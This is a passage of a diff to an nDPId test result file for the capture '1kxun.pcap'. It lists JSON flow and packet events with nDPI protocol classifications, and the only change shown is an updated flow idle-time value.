{"hostname":"183.131.48.144","url":"183.131.48.144\/vlive.qqvideo.tc.qq.com\/u0020mkrnds.p1203.1.mp4?vkey=7AB139BF6B32F53747E8FF192E6FE557B3A3D644C034E34BF6EAEB4E0774F2A92EF3AC5C007520BB925E5C8A18E6D302C2DAE0A295B26AA8FD1DC8069D47CE1B4A16A56870BD1ACA3E86ABE4C079659DB2182FC71217AB68CCD344CE65694457E3F53549CD617D5C9F671A26C70DC68F93F1D7BCD017762F&guid=F5EB01CC01A8E08CD83630828DE17C2B02162FD8&locid=a06f98fd-fa26-44e5-acc5-0d83f9df03af&size=9418655&ocid=253564332","code":0,"content_type":"","user_agent":""}} +01304{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":582,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1470104382053,"flow_last_seen":1470104382192,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":503,"flow_tot_l4_payload_len":1287,"flow_avg_l4_payload_len":143,"midstream":0,"thread_ts_msec":1470104382192,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"183.131.48.144","src_port":49613,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Media"},"http": {"hostname":"183.131.48.144","url":"183.131.48.144\/vlive.qqvideo.tc.qq.com\/u0020mkrnds.p1203.1.mp4?vkey=7AB139BF6B32F53747E8FF192E6FE557B3A3D644C034E34BF6EAEB4E0774F2A92EF3AC5C007520BB925E5C8A18E6D302C2DAE0A295B26AA8FD1DC8069D47CE1B4A16A56870BD1ACA3E86ABE4C079659DB2182FC71217AB68CCD344CE65694457E3F53549CD617D5C9F671A26C70DC68F93F1D7BCD017762F&guid=F5EB01CC01A8E08CD83630828DE17C2B02162FD8&locid=a06f98fd-fa26-44e5-acc5-0d83f9df03af&size=9418655&ocid=253564332","code":206,"content_type":"video\/mp4","user_agent":""}} 
00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":587,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104382241,"flow_last_seen":1470104382241,"flow_idle_time":180000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1470104382241,"l3_proto":"ip4","src_ip":"192.168.101.33","dst_ip":"239.255.255.250","src_port":55485,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00620{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":587,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":1,"flow_last_seen":1470104382241,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":175,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":175,"pkt_l4_len":141,"thread_ts_msec":1470104382241,"pkt":"AQBef\/\/6uKxvwfbSCABFAAChJ0YAAAERfELAqGUh7\/\/\/+ti9B2wAjWL8TS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDoyMzkuMjU1LjI1NS4yNTA6MTkwMA0KU1Q6dXJuOnNjaGVtYXMtdXBucC1vcmc6ZGV2aWNlOkludGVybmV0R2F0ZXdheURldmljZToxDQpNYW46InNzZHA6ZGlzY292ZXIiDQpNWDozDQoNCg=="} 00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":587,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104382241,"flow_last_seen":1470104382241,"flow_idle_time":180000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1470104382241,"l3_proto":"ip4","src_ip":"192.168.101.33","dst_ip":"239.255.255.250","src_port":55485,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 
@@ -251,26 +251,26 @@ 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":636,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104385827,"flow_last_seen":1470104385827,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1470104385827,"l3_proto":"ip4","src_ip":"59.120.208.218","dst_ip":"255.255.255.255","src_port":50151,"dst_port":1947,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":636,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":1,"flow_last_seen":1470104385827,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1470104385827,"pkt":"\/\/\/\/\/\/\/\/rCILUFkxCABFAABEAABAAEARLlc7eNDa\/\/\/\/\/8PnB5sAMKByU3Uyb1ZTdDRBQUJIWlc1MGNtbGpaVjlCVUVOZlozVmxjM1FBYldVQQ=="} 00621{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":653,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":3,"flow_last_seen":1470104387260,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":175,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":175,"pkt_l4_len":141,"thread_ts_msec":1470104387260,"pkt":"AQBef\/\/6CJ4BzeuNCABFAAChFFEAAAER7zPAqAUl7\/\/\/+t\/tB2wAjbvITS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDoyMzkuMjU1LjI1NS4yNTA6MTkwMA0KU1Q6dXJuOnNjaGVtYXMtdXBucC1vcmc6ZGV2aWNlOkludGVybmV0R2F0ZXdheURldmljZToxDQpNYW46InNzZHA6ZGlzY292ZXIiDQpNWDozDQoNCg=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":662,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104388033,"flow_last_seen":1470104388033,"flow_idle_time":7440000,"flow_min_l4_payload_len":1,"flow_max_l4_payload_len":1,"flow_tot_l4_payload_len":1,"flow_avg_l4_payload_len":1,"midstream":1,"thread_ts_msec":1470104388033,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"203.66.182.87","src_port":49596,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":662,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":1,"flow_last_seen":1470104388033,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":55,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":55,"pkt_l4_len":21,"thread_ts_msec":1470104388033,"pkt":"TF4M6gNlABxCjnAxCABFAAApUkZAAIAG8z3AqHMIy0K2V8G8AbsrwEGmNGHnvFAQAQOsiQAAAA=="} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":663,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":2,"flow_last_seen":1470104388033,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":55,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":55,"pkt_l4_len":21,"thread_ts_msec":1470104388033,"pkt":"TF4M6gNlABxCjnAxCABFAAApUkZAAIAG8z3AqHMIy0K2V8G8AbsrwEGmNGHnvFAQAQOsiQAAAA=="} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":664,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":3,"flow_last_seen":1470104388037,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104388037,"pkt":"ABxCjnAxTF4M6gNlCABFAAA0ZvMAAD0GYYbLQrZXwKhzCAG7wbw0Yee8K8BBp4AQAO2bugAAAQEFCivAQaYrwEGn"} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":662,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104388033,"flow_last_seen":1470104388033,"flow_idle_time":7560000,"flow_min_l4_payload_len":1,"flow_max_l4_payload_len":1,"flow_tot_l4_payload_len":1,"flow_avg_l4_payload_len":1,"midstream":1,"thread_ts_msec":1470104388033,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"203.66.182.87","src_port":49596,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":662,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":1,"flow_last_seen":1470104388033,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":55,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":55,"pkt_l4_len":21,"thread_ts_msec":1470104388033,"pkt":"TF4M6gNlABxCjnAxCABFAAApUkZAAIAG8z3AqHMIy0K2V8G8AbsrwEGmNGHnvFAQAQOsiQAAAA=="} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":663,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":2,"flow_last_seen":1470104388033,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":55,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":55,"pkt_l4_len":21,"thread_ts_msec":1470104388033,"pkt":"TF4M6gNlABxCjnAxCABFAAApUkZAAIAG8z3AqHMIy0K2V8G8AbsrwEGmNGHnvFAQAQOsiQAAAA=="} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":664,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":3,"flow_last_seen":1470104388037,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104388037,"pkt":"ABxCjnAxTF4M6gNlCABFAAA0ZvMAAD0GYYbLQrZXwKhzCAG7wbw0Yee8K8BBp4AQAO2bugAAAQEFCivAQaYrwEGn"} 
00620{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":665,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":3,"flow_last_seen":1470104388182,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":175,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":175,"pkt_l4_len":141,"thread_ts_msec":1470104388182,"pkt":"AQBef\/\/6uKxvwfbSCABFAAChJ0wAAAERfDzAqGUh7\/\/\/+ti9B2wAjWL8TS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDoyMzkuMjU1LjI1NS4yNTA6MTkwMA0KU1Q6dXJuOnNjaGVtYXMtdXBucC1vcmc6ZGV2aWNlOkludGVybmV0R2F0ZXdheURldmljZToxDQpNYW46InNzZHA6ZGlzY292ZXIiDQpNWDozDQoNCg=="} 00620{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":666,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":3,"flow_last_seen":1470104388182,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":175,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":175,"pkt_l4_len":141,"thread_ts_msec":1470104388182,"pkt":"AQBef\/\/6cPGh+Cr9CABFAAChfzUAAAERhGvAqAUJ7\/\/\/+ti8B2wAjcMVTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDoyMzkuMjU1LjI1NS4yNTA6MTkwMA0KU1Q6dXJuOnNjaGVtYXMtdXBucC1vcmc6ZGV2aWNlOkludGVybmV0R2F0ZXdheURldmljZToxDQpNYW46InNzZHA6ZGlzY292ZXIiDQpNWDozDQoNCg=="} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":680,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104389597,"flow_last_seen":1470104389597,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1470104389597,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"68.233.253.133","src_port":53613,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":680,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":1,"flow_last_seen":1470104389597,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104389597,"pkt":"TF4M6gNlYMVHBbyMCABFAAA0ErtAAEAGH+LAqAUQROn9hdFtAFBAFGHVDj7nf4AREAH2GQAAAQEIChoPOPTPHNz0"} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":693,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104390443,"flow_last_seen":1470104390443,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1470104390443,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"68.233.253.133","src_port":53624,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":693,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":1,"flow_last_seen":1470104390443,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1470104390443,"pkt":"TF4M6gNlYMVHBbyMCABFAABAN95AAEAG+rLAqAUQROn9hdF4AFAesUW4AAAAALAC\/\/+iVAAAAgQFtAEDAwUBAQgKGg88QAAAAAAEAgAA"} 
-00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":694,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":2,"flow_last_seen":1470104390640,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1470104390640,"pkt":"ABxCjnAxTF4M6gNlCABFAAA8AABAADUGPZVE6f2FwKgFEABQ0Xh2OO96HrFFuaASFqBImwAAAgQFtAQCCArPHh84Gg88QAEDAwg="} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":695,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":3,"flow_last_seen":1470104390640,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104390640,"pkt":"TF4M6gNlYMVHBbyMCABFAAA0PI1AAEAG9g\/AqAUQROn9hdF4AFAesUW5djjve4AQEBV9LwAAAQEIChoPPQTPHh84"} -00872{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":696,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1470104390443,"flow_last_seen":1470104390642,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":265,"flow_tot_l4_payload_len":265,"flow_avg_l4_payload_len":66,"midstream":0,"thread_ts_msec":1470104390642,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"68.233.253.133","src_port":53624,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"api.magicansoft.com","url":"api.magicansoft.com\/comMagicanApi\/composite\/app.php\/Global\/Index\/ip","code":0,"content_type":"","user_agent":"Magican (unknown version) CFNetwork\/720.5.7 Darwin\/14.5.0 (x86_64)"}} 
+00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":680,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104389597,"flow_last_seen":1470104389597,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1470104389597,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"68.233.253.133","src_port":53613,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":680,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":1,"flow_last_seen":1470104389597,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104389597,"pkt":"TF4M6gNlYMVHBbyMCABFAAA0ErtAAEAGH+LAqAUQROn9hdFtAFBAFGHVDj7nf4AREAH2GQAAAQEIChoPOPTPHNz0"} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":693,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104390443,"flow_last_seen":1470104390443,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1470104390443,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"68.233.253.133","src_port":53624,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":693,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":1,"flow_last_seen":1470104390443,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1470104390443,"pkt":"TF4M6gNlYMVHBbyMCABFAABAN95AAEAG+rLAqAUQROn9hdF4AFAesUW4AAAAALAC\/\/+iVAAAAgQFtAEDAwUBAQgKGg88QAAAAAAEAgAA"} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":694,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":2,"flow_last_seen":1470104390640,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1470104390640,"pkt":"ABxCjnAxTF4M6gNlCABFAAA8AABAADUGPZVE6f2FwKgFEABQ0Xh2OO96HrFFuaASFqBImwAAAgQFtAQCCArPHh84Gg88QAEDAwg="} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":695,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":3,"flow_last_seen":1470104390640,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104390640,"pkt":"TF4M6gNlYMVHBbyMCABFAAA0PI1AAEAG9g\/AqAUQROn9hdF4AFAesUW5djjve4AQEBV9LwAAAQEIChoPPQTPHh84"} 
+00872{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":696,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1470104390443,"flow_last_seen":1470104390642,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":265,"flow_tot_l4_payload_len":265,"flow_avg_l4_payload_len":66,"midstream":0,"thread_ts_msec":1470104390642,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"68.233.253.133","src_port":53624,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"api.magicansoft.com","url":"api.magicansoft.com\/comMagicanApi\/composite\/app.php\/Global\/Index\/ip","code":0,"content_type":"","user_agent":"Magican (unknown version) CFNetwork\/720.5.7 Darwin\/14.5.0 (x86_64)"}} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":697,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104390741,"flow_last_seen":1470104390741,"flow_idle_time":180000,"flow_min_l4_payload_len":123,"flow_max_l4_payload_len":123,"flow_tot_l4_payload_len":123,"flow_avg_l4_payload_len":123,"midstream":0,"thread_ts_msec":1470104390741,"l3_proto":"ip6","src_ip":"fe80::4e5e:cff:fe9a:ec54","dst_ip":"ff02::1","src_port":5678,"dst_port":5678,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00633{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":697,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":1,"flow_last_seen":1470104390741,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":185,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":185,"pkt_l4_len":131,"thread_ts_msec":1470104390741,"pkt":"MzMAAAABTF4MmuxUht1gAAAAAIMRAf6AAAAAAAAATl4M\/\/6a7FT\/AgAAAAAAAAAAAAAAAAABFi4WLgCDan0ABGg\/AAEABkxeDJrsVAAFAAAABwAPNi4zNS4xIChzdGFibGUpAAgACE1pa3JvVGlrAAoABHzzfwAACwAJM0RYWS1LSEdEAAwADUNSUzEyNS0yNEctMVMADgABAQAPABD+gAAAAAAAAE5eDP\/+muxUABAAB2JyaWRnZTE="} 00876{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":702,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":2,"flow_last_seen":1470104390945,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":359,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":359,"pkt_l4_len":325,"thread_ts_msec":1470104390945,"pkt":"\/\/\/\/\/\/\/\/XNmY3fXzCABFAAFZAABAAEARbn7AqApu\/\/\/\/\/+xA9gABRTgx\/\/8AAKAAXNmY3fXzwKgKbgAAAgAnAUROUy0xMTAwLTA0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABOQVMAAAAAAAAAAAAAVVqvihgAAABVWsE9WwAAAFVasDEuMDJiMTAAEXgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAXNmY3fXzM0ExAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGRsaW5rLURERjVGMwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADAqApu\/\/8AAExBTjEAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":706,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104391199,"flow_last_seen":1470104391199,"flow_idle_time":7440000,"flow_min_l4_payload_len":1,"flow_max_l4_payload_len":1,"flow_tot_l4_payload_len":1,"flow_avg_l4_payload_len":1,"midstream":1,"thread_ts_msec":1470104391199,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"64.233.189.128","src_port":49581,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":706,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":1,"flow_last_seen":1470104391199,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":55,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":55,"pkt_l4_len":21,"thread_ts_msec":1470104391199,"pkt":"TF4M6gNlABxCjnAxCABFAAApUk5AAIAGdmbAqHMIQOm9gMGtAFD1eICMR0KJzlAQAXpzKwAAAA=="} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":707,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":2,"flow_last_seen":1470104391199,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":55,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":55,"pkt_l4_len":21,"thread_ts_msec":1470104391199,"pkt":"TF4M6gNlABxCjnAxCABFAAApUk5AAIAGdmbAqHMIQOm9gMGtAFD1eICMR0KJzlAQAXpzKwAAAA=="} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":708,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":3,"flow_last_seen":1470104391208,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104391208,"pkt":"ABxCjnAxTF4M6gNlCABFAAA0a70AAC4G7uxA6b2AwKhzCABQwa1HQonO9XiAjYAQAVdRKwAAAQEFCvV4gIz1eICN"} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":706,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104391199,"flow_last_seen":1470104391199,"flow_idle_time":7560000,"flow_min_l4_payload_len":1,"flow_max_l4_payload_len":1,"flow_tot_l4_payload_len":1,"flow_avg_l4_payload_len":1,"midstream":1,"thread_ts_msec":1470104391199,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"64.233.189.128","src_port":49581,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":706,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":1,"flow_last_seen":1470104391199,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":55,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":55,"pkt_l4_len":21,"thread_ts_msec":1470104391199,"pkt":"TF4M6gNlABxCjnAxCABFAAApUk5AAIAGdmbAqHMIQOm9gMGtAFD1eICMR0KJzlAQAXpzKwAAAA=="} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":707,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":2,"flow_last_seen":1470104391199,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":55,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":55,"pkt_l4_len":21,"thread_ts_msec":1470104391199,"pkt":"TF4M6gNlABxCjnAxCABFAAApUk5AAIAGdmbAqHMIQOm9gMGtAFD1eICMR0KJzlAQAXpzKwAAAA=="} 